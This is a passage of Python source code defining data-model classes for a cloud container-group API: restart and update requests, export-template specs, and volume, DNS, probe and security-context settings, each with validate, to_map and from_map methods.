        self.searches = list(map.get('Searches')) if map.get('Searches') is not None else None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecSecurityContextSysctls(TeaModel):
    """A single sysctl name/value pair of the pod-level security context."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Both fields are required."""
        for val, label in ((self.name, 'name'), (self.value, 'value')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.name = map.get('Name')
        self.value = map.get('Value')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecSecurityContext(TeaModel):
    """Pod-level security context of the template spec: a list of sysctls."""
    def __init__(self, sysctls=None):
        # Bug fix: the constructor previously ignored the ``sysctls``
        # argument and always assigned []. Keep [] as the default.
        self.sysctls = [] if sysctls is None else sysctls
    def validate(self):
        """Require sysctls; validate each non-empty entry."""
        self.validate_required(self.sysctls, 'sysctls')
        if self.sysctls:
            for k in self.sysctls:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a plain dict; a None list maps to None."""
        result = {}
        result['Sysctls'] = []
        if self.sysctls is not None:
            for k in self.sysctls:
                result['Sysctls'].append(k.to_map() if k else None)
        else:
            result['Sysctls'] = None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.sysctls = []
        if map.get('Sysctls') is not None:
            for k in map.get('Sysctls'):
                temp_model = ExportContainerGroupTemplateResponseTemplateSpecSecurityContextSysctls()
                self.sysctls.append(temp_model.from_map(k))
        else:
            self.sysctls = None
        return self
class ExportContainerGroupTemplateResponseTemplateSpec(TeaModel):
    """Spec section of the exported container-group template."""
    def __init__(self, restart_policy=None, dns_policy=None, volumes=None, init_containers=None, containers=None, dns_config=None, security_context=None):
        self.restart_policy = restart_policy
        self.dns_policy = dns_policy
        # Bug fix: the list arguments (volumes, init_containers, containers)
        # were previously ignored and always reset to []. Keep [] as default.
        self.volumes = [] if volumes is None else volumes
        self.init_containers = [] if init_containers is None else init_containers
        self.containers = [] if containers is None else containers
        self.dns_config = dns_config
        self.security_context = security_context
    def validate(self):
        """Require every field; recurse into list entries and sub-models."""
        self.validate_required(self.restart_policy, 'restart_policy')
        self.validate_required(self.dns_policy, 'dns_policy')
        self.validate_required(self.volumes, 'volumes')
        if self.volumes:
            for k in self.volumes:
                if k:
                    k.validate()
        self.validate_required(self.init_containers, 'init_containers')
        if self.init_containers:
            for k in self.init_containers:
                if k:
                    k.validate()
        self.validate_required(self.containers, 'containers')
        if self.containers:
            for k in self.containers:
                if k:
                    k.validate()
        self.validate_required(self.dns_config, 'dns_config')
        if self.dns_config:
            self.dns_config.validate()
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()
    def to_map(self):
        """Serialize to a plain dict; None lists/sub-models map to None."""
        result = {}
        result['RestartPolicy'] = self.restart_policy
        result['DnsPolicy'] = self.dns_policy
        result['Volumes'] = [k.to_map() if k else None for k in self.volumes] if self.volumes is not None else None
        result['InitContainers'] = [k.to_map() if k else None for k in self.init_containers] if self.init_containers is not None else None
        result['Containers'] = [k.to_map() if k else None for k in self.containers] if self.containers is not None else None
        result['DnsConfig'] = self.dns_config.to_map() if self.dns_config is not None else None
        result['SecurityContext'] = self.security_context.to_map() if self.security_context is not None else None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.restart_policy = map.get('RestartPolicy')
        self.dns_policy = map.get('DnsPolicy')
        if map.get('Volumes') is not None:
            self.volumes = [ExportContainerGroupTemplateResponseTemplateSpecVolumes().from_map(k) for k in map.get('Volumes')]
        else:
            self.volumes = None
        if map.get('InitContainers') is not None:
            self.init_containers = [ExportContainerGroupTemplateResponseTemplateSpecInitContainers().from_map(k) for k in map.get('InitContainers')]
        else:
            self.init_containers = None
        if map.get('Containers') is not None:
            self.containers = [ExportContainerGroupTemplateResponseTemplateSpecContainers().from_map(k) for k in map.get('Containers')]
        else:
            self.containers = None
        if map.get('DnsConfig') is not None:
            self.dns_config = ExportContainerGroupTemplateResponseTemplateSpecDnsConfig().from_map(map['DnsConfig'])
        else:
            self.dns_config = None
        if map.get('SecurityContext') is not None:
            self.security_context = ExportContainerGroupTemplateResponseTemplateSpecSecurityContext().from_map(map['SecurityContext'])
        else:
            self.security_context = None
        return self
class ExportContainerGroupTemplateResponseTemplate(TeaModel):
    """Top-level template of an ExportContainerGroupTemplate response."""
    def __init__(self, region_id=None, zone_id=None, security_group_id=None, v_switch_id=None, resource_group_id=None, eip_instance_id=None, container_group_name=None, instance_type=None, tags=None, resources=None, spec=None):
        self.region_id = region_id
        self.zone_id = zone_id
        self.security_group_id = security_group_id
        self.v_switch_id = v_switch_id
        self.resource_group_id = resource_group_id
        self.eip_instance_id = eip_instance_id
        self.container_group_name = container_group_name
        self.instance_type = instance_type
        # Bug fix: the ``tags`` argument was previously ignored and the
        # attribute always reset to []. Keep [] as the default.
        self.tags = [] if tags is None else tags
        self.resources = resources
        self.spec = spec
    def validate(self):
        """Require every field; recurse into tags, resources and spec."""
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.zone_id, 'zone_id')
        self.validate_required(self.security_group_id, 'security_group_id')
        self.validate_required(self.v_switch_id, 'v_switch_id')
        self.validate_required(self.resource_group_id, 'resource_group_id')
        self.validate_required(self.eip_instance_id, 'eip_instance_id')
        self.validate_required(self.container_group_name, 'container_group_name')
        self.validate_required(self.instance_type, 'instance_type')
        self.validate_required(self.tags, 'tags')
        if self.tags:
            for k in self.tags:
                if k:
                    k.validate()
        self.validate_required(self.resources, 'resources')
        if self.resources:
            self.resources.validate()
        self.validate_required(self.spec, 'spec')
        if self.spec:
            self.spec.validate()
    def to_map(self):
        """Serialize to a plain dict; None lists/sub-models map to None."""
        result = {}
        result['RegionId'] = self.region_id
        result['ZoneId'] = self.zone_id
        result['SecurityGroupId'] = self.security_group_id
        result['VSwitchId'] = self.v_switch_id
        result['ResourceGroupId'] = self.resource_group_id
        result['EipInstanceId'] = self.eip_instance_id
        result['ContainerGroupName'] = self.container_group_name
        result['InstanceType'] = self.instance_type
        result['Tags'] = [k.to_map() if k else None for k in self.tags] if self.tags is not None else None
        result['Resources'] = self.resources.to_map() if self.resources is not None else None
        result['Spec'] = self.spec.to_map() if self.spec is not None else None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.region_id = map.get('RegionId')
        self.zone_id = map.get('ZoneId')
        self.security_group_id = map.get('SecurityGroupId')
        self.v_switch_id = map.get('VSwitchId')
        self.resource_group_id = map.get('ResourceGroupId')
        self.eip_instance_id = map.get('EipInstanceId')
        self.container_group_name = map.get('ContainerGroupName')
        self.instance_type = map.get('InstanceType')
        if map.get('Tags') is not None:
            self.tags = [ExportContainerGroupTemplateResponseTemplateTags().from_map(k) for k in map.get('Tags')]
        else:
            self.tags = None
        if map.get('Resources') is not None:
            self.resources = ExportContainerGroupTemplateResponseTemplateResources().from_map(map['Resources'])
        else:
            self.resources = None
        if map.get('Spec') is not None:
            self.spec = ExportContainerGroupTemplateResponseTemplateSpec().from_map(map['Spec'])
        else:
            self.spec = None
        return self
class RestartContainerGroupRequest(TeaModel):
    """Request model for the RestartContainerGroup operation."""
    def __init__(self, region_id=None, container_group_id=None, client_token=None):
        self.region_id = region_id
        self.container_group_id = container_group_id
        self.client_token = client_token  # optional idempotency token
    def validate(self):
        """region_id and container_group_id are required; client_token is optional."""
        for val, label in ((self.region_id, 'region_id'),
                           (self.container_group_id, 'container_group_id')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {
            'RegionId': self.region_id,
            'ContainerGroupId': self.container_group_id,
            'ClientToken': self.client_token,
        }
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.region_id = map.get('RegionId')
        self.container_group_id = map.get('ContainerGroupId')
        self.client_token = map.get('ClientToken')
        return self
class RestartContainerGroupResponse(TeaModel):
    """Response model for the RestartContainerGroup operation."""
    def __init__(self, request_id=None):
        self.request_id = request_id
    def validate(self):
        """The request id is required."""
        self.validate_required(self.request_id, 'request_id')
    def to_map(self):
        """Serialize to a plain dict."""
        return {'RequestId': self.request_id}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.request_id = map.get('RequestId')
        return self
class UpdateContainerGroupRequest(TeaModel):
    """Request model for the UpdateContainerGroup operation."""
    def __init__(self, region_id=None, container_group_id=None, restart_policy=None, tag=None, volume=None, dns_config=None, container=None, init_container=None, image_registry_credential=None, client_token=None, cpu=None, memory=None):
        self.region_id = region_id
        self.container_group_id = container_group_id
        self.restart_policy = restart_policy
        # Bug fix: the list-typed arguments (tag, volume, container,
        # init_container, image_registry_credential) were previously ignored
        # and always reset to []. Keep [] as the default.
        self.tag = [] if tag is None else tag
        self.volume = [] if volume is None else volume
        self.dns_config = dns_config
        self.container = [] if container is None else container
        self.init_container = [] if init_container is None else init_container
        self.image_registry_credential = [] if image_registry_credential is None else image_registry_credential
        self.client_token = client_token
        self.cpu = cpu
        self.memory = memory
    def validate(self):
        """Require the mandatory fields; validate list entries and dns_config."""
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.container_group_id, 'container_group_id')
        if self.tag:
            for k in self.tag:
                if k:
                    k.validate()
        if self.volume:
            for k in self.volume:
                if k:
                    k.validate()
        self.validate_required(self.dns_config, 'dns_config')
        if self.dns_config:
            self.dns_config.validate()
        if self.container:
            for k in self.container:
                if k:
                    k.validate()
        if self.init_container:
            for k in self.init_container:
                if k:
                    k.validate()
        if self.image_registry_credential:
            for k in self.image_registry_credential:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a plain dict; None lists/sub-models map to None."""
        result = {}
        result['RegionId'] = self.region_id
        result['ContainerGroupId'] = self.container_group_id
        result['RestartPolicy'] = self.restart_policy
        result['Tag'] = [k.to_map() if k else None for k in self.tag] if self.tag is not None else None
        result['Volume'] = [k.to_map() if k else None for k in self.volume] if self.volume is not None else None
        result['DnsConfig'] = self.dns_config.to_map() if self.dns_config is not None else None
        result['Container'] = [k.to_map() if k else None for k in self.container] if self.container is not None else None
        result['InitContainer'] = [k.to_map() if k else None for k in self.init_container] if self.init_container is not None else None
        result['ImageRegistryCredential'] = [k.to_map() if k else None for k in self.image_registry_credential] if self.image_registry_credential is not None else None
        result['ClientToken'] = self.client_token
        result['Cpu'] = self.cpu
        result['Memory'] = self.memory
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.region_id = map.get('RegionId')
        self.container_group_id = map.get('ContainerGroupId')
        self.restart_policy = map.get('RestartPolicy')
        if map.get('Tag') is not None:
            self.tag = [UpdateContainerGroupRequestTag().from_map(k) for k in map.get('Tag')]
        else:
            self.tag = None
        if map.get('Volume') is not None:
            self.volume = [UpdateContainerGroupRequestVolume().from_map(k) for k in map.get('Volume')]
        else:
            self.volume = None
        if map.get('DnsConfig') is not None:
            self.dns_config = UpdateContainerGroupRequestDnsConfig().from_map(map['DnsConfig'])
        else:
            self.dns_config = None
        if map.get('Container') is not None:
            self.container = [UpdateContainerGroupRequestContainer().from_map(k) for k in map.get('Container')]
        else:
            self.container = None
        if map.get('InitContainer') is not None:
            self.init_container = [UpdateContainerGroupRequestInitContainer().from_map(k) for k in map.get('InitContainer')]
        else:
            self.init_container = None
        if map.get('ImageRegistryCredential') is not None:
            self.image_registry_credential = [UpdateContainerGroupRequestImageRegistryCredential().from_map(k) for k in map.get('ImageRegistryCredential')]
        else:
            self.image_registry_credential = None
        self.client_token = map.get('ClientToken')
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        return self
class UpdateContainerGroupRequestTag(TeaModel):
    """A key/value tag of an UpdateContainerGroup request; both fields optional."""
    def __init__(self, key=None, value=None):
        self.key = key
        self.value = value
    def validate(self):
        """No required fields."""
        pass
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Key': self.key, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.key = map.get('Key')
        self.value = map.get('Value')
        return self
class UpdateContainerGroupRequestVolumeNFSVolume(TeaModel):
    """NFS volume source: server address, exported path, read-only flag."""
    def __init__(self, server=None, path=None, read_only=None):
        self.server, self.path, self.read_only = server, path, read_only

    def validate(self):
        pass

    def to_map(self):
        return {'Server': self.server, 'Path': self.path, 'ReadOnly': self.read_only}

    def from_map(self, map={}):
        self.server = map.get('Server')
        self.path = map.get('Path')
        self.read_only = map.get('ReadOnly')
        return self
class UpdateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath(TeaModel):
    """One config-file entry: file content plus its mount path."""
    def __init__(self, content=None, path=None):
        self.content, self.path = content, path

    def validate(self):
        pass

    def to_map(self):
        return {'Content': self.content, 'Path': self.path}

    def from_map(self, map={}):
        self.content, self.path = map.get('Content'), map.get('Path')
        return self
class UpdateContainerGroupRequestVolumeConfigFileVolume(TeaModel):
    """ConfigFileVolume section of a Volume: list of ConfigFileToPath entries."""
    def __init__(self, config_file_to_path=None):
        # Bug fix: the constructor argument was previously ignored and the
        # field was always reset to []. Honor the caller-supplied list.
        self.config_file_to_path = [] if config_file_to_path is None else config_file_to_path

    def validate(self):
        """Require the list and validate each non-None entry."""
        self.validate_required(self.config_file_to_path, 'config_file_to_path')
        if self.config_file_to_path:
            for k in self.config_file_to_path:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        result = {}
        if self.config_file_to_path is not None:
            result['ConfigFileToPath'] = [k.to_map() if k else None for k in self.config_file_to_path]
        else:
            result['ConfigFileToPath'] = None
        return result

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('ConfigFileToPath')
        if raw is not None:
            self.config_file_to_path = [UpdateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath().from_map(k) for k in raw]
        else:
            self.config_file_to_path = None
        return self
class UpdateContainerGroupRequestVolumeEmptyDirVolume(TeaModel):
    """EmptyDir volume source; `medium` selects the backing storage."""
    def __init__(self, medium=None):
        self.medium = medium

    def validate(self):
        pass

    def to_map(self):
        return {'Medium': self.medium}

    def from_map(self, map={}):
        self.medium = map.get('Medium')
        return self
class UpdateContainerGroupRequestVolume(TeaModel):
    """A volume definition: name/type plus one of the typed volume sources."""
    def __init__(self, name=None, type=None, nfsvolume=None, config_file_volume=None, empty_dir_volume=None):
        self.name = name
        self.type = type
        self.nfsvolume = nfsvolume
        self.config_file_volume = config_file_volume
        self.empty_dir_volume = empty_dir_volume

    def validate(self):
        """Require every typed source and validate each present one."""
        for child, label in ((self.nfsvolume, 'nfsvolume'),
                             (self.config_file_volume, 'config_file_volume'),
                             (self.empty_dir_volume, 'empty_dir_volume')):
            self.validate_required(child, label)
            if child:
                child.validate()

    def to_map(self):
        return {
            'Name': self.name,
            'Type': self.type,
            'NFSVolume': self.nfsvolume.to_map() if self.nfsvolume is not None else None,
            'ConfigFileVolume': self.config_file_volume.to_map() if self.config_file_volume is not None else None,
            'EmptyDirVolume': self.empty_dir_volume.to_map() if self.empty_dir_volume is not None else None,
        }

    def from_map(self, map={}):
        self.name = map.get('Name')
        self.type = map.get('Type')
        raw = map.get('NFSVolume')
        self.nfsvolume = UpdateContainerGroupRequestVolumeNFSVolume().from_map(raw) if raw is not None else None
        raw = map.get('ConfigFileVolume')
        self.config_file_volume = UpdateContainerGroupRequestVolumeConfigFileVolume().from_map(raw) if raw is not None else None
        raw = map.get('EmptyDirVolume')
        self.empty_dir_volume = UpdateContainerGroupRequestVolumeEmptyDirVolume().from_map(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestDnsConfigOption(TeaModel):
    """A single DNS resolver option (name/value pair)."""
    def __init__(self, name=None, value=None):
        self.name, self.value = name, value

    def validate(self):
        pass

    def to_map(self):
        return {'Name': self.name, 'Value': self.value}

    def from_map(self, map={}):
        self.name, self.value = map.get('Name'), map.get('Value')
        return self
class UpdateContainerGroupRequestDnsConfig(TeaModel):
    """DNS configuration: name servers, search domains, and resolver options."""
    def __init__(self, name_server=None, search=None, option=None):
        # Bug fix: all three constructor arguments were previously ignored
        # and the fields were always reset to []. Honor caller-supplied lists.
        self.name_server = [] if name_server is None else name_server
        self.search = [] if search is None else search
        self.option = [] if option is None else option

    def validate(self):
        """Validate each non-None Option entry (plain-string lists need none)."""
        if self.option:
            for k in self.option:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        result = {}
        result['NameServer'] = list(self.name_server) if self.name_server is not None else None
        result['Search'] = list(self.search) if self.search is not None else None
        result['Option'] = [k.to_map() if k else None for k in self.option] if self.option is not None else None
        return result

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('NameServer')
        self.name_server = list(raw) if raw is not None else None
        raw = map.get('Search')
        self.search = list(raw) if raw is not None else None
        raw = map.get('Option')
        if raw is not None:
            self.option = [UpdateContainerGroupRequestDnsConfigOption().from_map(k) for k in raw]
        else:
            self.option = None
        return self
class UpdateContainerGroupRequestContainerEnvironmentVar(TeaModel):
    """An environment variable (key/value) for a container."""
    def __init__(self, key=None, value=None):
        self.key, self.value = key, value

    def validate(self):
        pass

    def to_map(self):
        return {'Key': self.key, 'Value': self.value}

    def from_map(self, map={}):
        self.key, self.value = map.get('Key'), map.get('Value')
        return self
class UpdateContainerGroupRequestContainerPort(TeaModel):
    """An exposed container port (protocol + port number)."""
    def __init__(self, protocol=None, port=None):
        self.protocol, self.port = protocol, port

    def validate(self):
        pass

    def to_map(self):
        return {'Protocol': self.protocol, 'Port': self.port}

    def from_map(self, map={}):
        self.protocol, self.port = map.get('Protocol'), map.get('Port')
        return self
class UpdateContainerGroupRequestContainerVolumeMount(TeaModel):
    """A volume mount inside a container (volume name, path, read-only)."""
    def __init__(self, name=None, mount_path=None, sub_path=None, read_only=None):
        self.name = name
        self.mount_path = mount_path
        self.sub_path = sub_path
        self.read_only = read_only

    def validate(self):
        pass

    def to_map(self):
        return {
            'Name': self.name,
            'MountPath': self.mount_path,
            'SubPath': self.sub_path,
            'ReadOnly': self.read_only,
        }

    def from_map(self, map={}):
        for attr, key in (('name', 'Name'), ('mount_path', 'MountPath'),
                          ('sub_path', 'SubPath'), ('read_only', 'ReadOnly')):
            setattr(self, attr, map.get(key))
        return self
class UpdateContainerGroupRequestContainerReadinessProbeTcpSocket(TeaModel):
    """TcpSocket action of the readiness probe: the port to connect to."""
    def __init__(self, port=None):
        self.port = port

    def validate(self):
        pass

    def to_map(self):
        return {'Port': self.port}

    def from_map(self, map={}):
        self.port = map.get('Port')
        return self
class UpdateContainerGroupRequestContainerReadinessProbeExec(TeaModel):
    """Exec action of the readiness probe: the command to run in the container."""
    def __init__(self, command=None):
        # Bug fix: `command` was previously ignored and the field was
        # always reset to []. Honor the caller-supplied list.
        self.command = [] if command is None else command

    def validate(self):
        self.validate_required(self.command, 'command')

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        return {'Command': list(self.command) if self.command is not None else None}

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('Command')
        self.command = list(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestContainerReadinessProbeHttpGet(TeaModel):
    """HttpGet action of the readiness probe (path, port, scheme)."""
    def __init__(self, path=None, port=None, scheme=None):
        self.path, self.port, self.scheme = path, port, scheme

    def validate(self):
        pass

    def to_map(self):
        return {'Path': self.path, 'Port': self.port, 'Scheme': self.scheme}

    def from_map(self, map={}):
        self.path = map.get('Path')
        self.port = map.get('Port')
        self.scheme = map.get('Scheme')
        return self
class UpdateContainerGroupRequestContainerReadinessProbe(TeaModel):
    """Readiness probe: an action (TcpSocket/Exec/HttpGet) plus timing settings."""
    def __init__(self, tcp_socket=None, exec=None, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None):
        self.tcp_socket = tcp_socket
        self.exec = exec
        self.http_get = http_get
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.timeout_seconds = timeout_seconds

    def validate(self):
        """Require each action field and validate the present ones."""
        for child, label in ((self.tcp_socket, 'tcp_socket'),
                             (self.exec, 'exec'),
                             (self.http_get, 'http_get')):
            self.validate_required(child, label)
            if child:
                child.validate()

    def to_map(self):
        return {
            'TcpSocket': self.tcp_socket.to_map() if self.tcp_socket is not None else None,
            'Exec': self.exec.to_map() if self.exec is not None else None,
            'HttpGet': self.http_get.to_map() if self.http_get is not None else None,
            'InitialDelaySeconds': self.initial_delay_seconds,
            'PeriodSeconds': self.period_seconds,
            'SuccessThreshold': self.success_threshold,
            'FailureThreshold': self.failure_threshold,
            'TimeoutSeconds': self.timeout_seconds,
        }

    def from_map(self, map={}):
        raw = map.get('TcpSocket')
        self.tcp_socket = UpdateContainerGroupRequestContainerReadinessProbeTcpSocket().from_map(raw) if raw is not None else None
        raw = map.get('Exec')
        self.exec = UpdateContainerGroupRequestContainerReadinessProbeExec().from_map(raw) if raw is not None else None
        raw = map.get('HttpGet')
        self.http_get = UpdateContainerGroupRequestContainerReadinessProbeHttpGet().from_map(raw) if raw is not None else None
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        self.timeout_seconds = map.get('TimeoutSeconds')
        return self
class UpdateContainerGroupRequestContainerLivenessProbeTcpSocket(TeaModel):
    """TcpSocket action of the liveness probe: the port to connect to."""
    def __init__(self, port=None):
        self.port = port

    def validate(self):
        pass

    def to_map(self):
        return {'Port': self.port}

    def from_map(self, map={}):
        self.port = map.get('Port')
        return self
class UpdateContainerGroupRequestContainerLivenessProbeExec(TeaModel):
    """Exec action of the liveness probe: the command to run in the container."""
    def __init__(self, command=None):
        # Bug fix: `command` was previously ignored and the field was
        # always reset to []. Honor the caller-supplied list.
        self.command = [] if command is None else command

    def validate(self):
        self.validate_required(self.command, 'command')

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        return {'Command': list(self.command) if self.command is not None else None}

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('Command')
        self.command = list(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestContainerLivenessProbeHttpGet(TeaModel):
    """HttpGet action of the liveness probe (path, port, scheme)."""
    def __init__(self, path=None, port=None, scheme=None):
        self.path, self.port, self.scheme = path, port, scheme

    def validate(self):
        pass

    def to_map(self):
        return {'Path': self.path, 'Port': self.port, 'Scheme': self.scheme}

    def from_map(self, map={}):
        self.path = map.get('Path')
        self.port = map.get('Port')
        self.scheme = map.get('Scheme')
        return self
class UpdateContainerGroupRequestContainerLivenessProbe(TeaModel):
    """Liveness probe: an action (TcpSocket/Exec/HttpGet) plus timing settings."""
    def __init__(self, tcp_socket=None, exec=None, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None):
        self.tcp_socket = tcp_socket
        self.exec = exec
        self.http_get = http_get
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.timeout_seconds = timeout_seconds

    def validate(self):
        """Require each action field (validating present ones) and failure_threshold."""
        for child, label in ((self.tcp_socket, 'tcp_socket'),
                             (self.exec, 'exec'),
                             (self.http_get, 'http_get')):
            self.validate_required(child, label)
            if child:
                child.validate()
        self.validate_required(self.failure_threshold, 'failure_threshold')

    def to_map(self):
        return {
            'TcpSocket': self.tcp_socket.to_map() if self.tcp_socket is not None else None,
            'Exec': self.exec.to_map() if self.exec is not None else None,
            'HttpGet': self.http_get.to_map() if self.http_get is not None else None,
            'InitialDelaySeconds': self.initial_delay_seconds,
            'PeriodSeconds': self.period_seconds,
            'SuccessThreshold': self.success_threshold,
            'FailureThreshold': self.failure_threshold,
            'TimeoutSeconds': self.timeout_seconds,
        }

    def from_map(self, map={}):
        raw = map.get('TcpSocket')
        self.tcp_socket = UpdateContainerGroupRequestContainerLivenessProbeTcpSocket().from_map(raw) if raw is not None else None
        raw = map.get('Exec')
        self.exec = UpdateContainerGroupRequestContainerLivenessProbeExec().from_map(raw) if raw is not None else None
        raw = map.get('HttpGet')
        self.http_get = UpdateContainerGroupRequestContainerLivenessProbeHttpGet().from_map(raw) if raw is not None else None
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        self.timeout_seconds = map.get('TimeoutSeconds')
        return self
class UpdateContainerGroupRequestContainerSecurityContextCapability(TeaModel):
    """Linux capabilities to add to a container's security context."""
    def __init__(self, add=None):
        # Bug fix: `add` was previously ignored and the field was always
        # reset to []. Honor the caller-supplied list.
        self.add = [] if add is None else add

    def validate(self):
        self.validate_required(self.add, 'add')

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        return {'Add': list(self.add) if self.add is not None else None}

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('Add')
        self.add = list(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestContainerSecurityContext(TeaModel):
    """Container security settings: root-FS flag, run-as user, capabilities."""
    def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
        self.read_only_root_filesystem = read_only_root_filesystem
        self.run_as_user = run_as_user
        self.capability = capability

    def validate(self):
        self.validate_required(self.capability, 'capability')
        if self.capability:
            self.capability.validate()

    def to_map(self):
        cap = self.capability.to_map() if self.capability is not None else None
        return {
            'ReadOnlyRootFilesystem': self.read_only_root_filesystem,
            'RunAsUser': self.run_as_user,
            'Capability': cap,
        }

    def from_map(self, map={}):
        self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
        self.run_as_user = map.get('RunAsUser')
        raw = map.get('Capability')
        self.capability = UpdateContainerGroupRequestContainerSecurityContextCapability().from_map(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestContainer(TeaModel):
    """One container definition in an UpdateContainerGroup request."""
    def __init__(self, name=None, image=None, cpu=None, memory=None, working_dir=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, command=None, arg=None, environment_var=None, port=None, volume_mount=None, readiness_probe=None, liveness_probe=None, security_context=None, gpu=None):
        self.name = name
        self.image = image
        self.cpu = cpu
        self.memory = memory
        self.working_dir = working_dir
        self.image_pull_policy = image_pull_policy
        self.stdin = stdin
        self.stdin_once = stdin_once
        self.tty = tty
        # Bug fix: the list arguments (command, arg, environment_var, port,
        # volume_mount) were previously ignored and the fields were always
        # reset to []. Honor caller-supplied lists.
        self.command = [] if command is None else command
        self.arg = [] if arg is None else arg
        self.environment_var = [] if environment_var is None else environment_var
        self.port = [] if port is None else port
        self.volume_mount = [] if volume_mount is None else volume_mount
        self.readiness_probe = readiness_probe
        self.liveness_probe = liveness_probe
        self.security_context = security_context
        self.gpu = gpu

    def validate(self):
        """Require the list/model fields and validate nested models."""
        self.validate_required(self.command, 'command')
        self.validate_required(self.arg, 'arg')
        for items, label in ((self.environment_var, 'environment_var'),
                             (self.port, 'port'),
                             (self.volume_mount, 'volume_mount')):
            self.validate_required(items, label)
            if items:
                for k in items:
                    if k:
                        k.validate()
        for child, label in ((self.readiness_probe, 'readiness_probe'),
                             (self.liveness_probe, 'liveness_probe'),
                             (self.security_context, 'security_context')):
            self.validate_required(child, label)
            if child:
                child.validate()

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        result = {}
        result['Name'] = self.name
        result['Image'] = self.image
        result['Cpu'] = self.cpu
        result['Memory'] = self.memory
        result['WorkingDir'] = self.working_dir
        result['ImagePullPolicy'] = self.image_pull_policy
        result['Stdin'] = self.stdin
        result['StdinOnce'] = self.stdin_once
        result['Tty'] = self.tty
        result['Command'] = list(self.command) if self.command is not None else None
        result['Arg'] = list(self.arg) if self.arg is not None else None
        result['EnvironmentVar'] = [k.to_map() if k else None for k in self.environment_var] if self.environment_var is not None else None
        result['Port'] = [k.to_map() if k else None for k in self.port] if self.port is not None else None
        result['VolumeMount'] = [k.to_map() if k else None for k in self.volume_mount] if self.volume_mount is not None else None
        result['ReadinessProbe'] = self.readiness_probe.to_map() if self.readiness_probe is not None else None
        result['LivenessProbe'] = self.liveness_probe.to_map() if self.liveness_probe is not None else None
        result['SecurityContext'] = self.security_context.to_map() if self.security_context is not None else None
        result['Gpu'] = self.gpu
        return result

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        self.name = map.get('Name')
        self.image = map.get('Image')
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        self.working_dir = map.get('WorkingDir')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.stdin = map.get('Stdin')
        self.stdin_once = map.get('StdinOnce')
        self.tty = map.get('Tty')
        raw = map.get('Command')
        self.command = list(raw) if raw is not None else None
        raw = map.get('Arg')
        self.arg = list(raw) if raw is not None else None
        raw = map.get('EnvironmentVar')
